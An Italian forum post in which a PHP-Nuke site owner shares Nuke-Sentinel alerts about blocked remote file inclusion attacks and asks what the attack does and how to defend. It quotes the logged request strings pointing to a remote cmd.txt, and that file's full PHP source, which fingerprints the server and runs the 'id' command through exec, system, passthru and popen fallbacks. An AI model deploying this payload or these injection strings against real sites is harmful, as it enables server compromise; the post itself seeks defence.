attacchi fermati da nuke-sentinel

**the programmer** · 09-10-2007, 14:02

ciao a tutti!
mi sono arrivate due email di nuke-sentinel che mi avvisano di presunti attacchi bloccati!
ecco il testo dell'ultima email:

codice:

Data e ora: 2007-10-08 13:12:01 CEST GMT +0200
IP bloccato: 74.86.24.133
ID Utente: Anonimo (1)
Motivo: Abuse-Filter
--------------------
User-Agent: libwww-perl/5.808
Query string: http://www.jollyroger2.helloweb.eu/m...t/TNG/cmd.txt?
Stringa GET: http://www.jollyroger2.helloweb.eu/m...t/TNG/cmd.txt?
Stringa POST: http://www.jollyroger2.helloweb.eu/m...dmin/index.php
Rinviato per: none
IP del client: none
Indirizzo remoto: 74.86.24.133
Porta remota: 46254
Metodo Richiesta: GET

Ora il link di questo s...zo porta al file cmd.txt di un dominio che ad ogni attacco cambia cosi' come l'ip, che mi fa pensare usi un proxy.
il testo della prima email:

codice:

Data e ora: 2007-10-06 21:35:30 CEST GMT +0200
IP bloccato: 217.130.26.68
ID Utente: Anonimo (1)
Motivo: Abuse-Filter
--------------------
User-Agent: libwww-perl/5.805
Query string: http://www.jollyroger2.helloweb.eu/m...g.uk/cmd.txt??
Stringa GET: http://www.jollyroger2.helloweb.eu/m...g.uk/cmd.txt??
Stringa POST: http://www.jollyroger2.helloweb.eu/m...min_styles.php
Rinviato per: none
IP del client: none
Indirizzo remoto: 217.130.26.68
Porta remota: 48126
Metodo Richiesta: GET

il testo del file cmd.txt e' questo:

Codice PHP:


<?php

echo "Mic22";

$dir = @getcwd();

$ker = @php_uname();

$OS = @PHP_OS;

echo "
OSTYPE:$OS
";

echo "
Kernel:$ker
";

$free = disk_free_space($dir); 

if ($free === FALSE) {$free = 0;} 

if ($free < 0) {$free = 0;} 

echo "Free:".view_size($free)."
"; 

$cmd="id";

$eseguicmd=ex($cmd);

echo $eseguicmd;

function ex($cfe){

$res = '';

if (!empty($cfe)){

if(function_exists('exec')){

@exec($cfe,$res);

$res = join("\n",$res);

}

elseif(function_exists('shell_exec')){

$res = @shell_exec($cfe);

}

elseif(function_exists('system')){

@ob_start();

@system($cfe);

$res = @ob_get_contents();

@ob_end_clean();

}

elseif(function_exists('passthru')){

@ob_start();

@passthru($cfe);

$res = @ob_get_contents();

@ob_end_clean();

}

elseif(@is_resource($f = @popen($cfe,"r"))){

$res = "";

while(!@feof($f)) { $res .= @fread($f,1024); }

@pclose($f);

}}

return $res;

}

function view_size($size) 

{ 

if (!is_numeric($size)) {return FALSE;} 

else 

{ 

if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} 

elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} 

elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} 

else {$size = $size . " B";} 

return $size; 

}

} 

exit;

dal codice chiama alcune funzioni che non capisco dato che non conosco php-nuke.
e' possibile rintracciare l'autore di queste malefatte?
cosa fa lo script?
come posso difendermi?

grazie

Discussione: attacchi fermati da nuke-sentinel

Strumenti discussione

Ricerca discussione

Visualizza

attacchi fermati da nuke-sentinel

Permessi di invio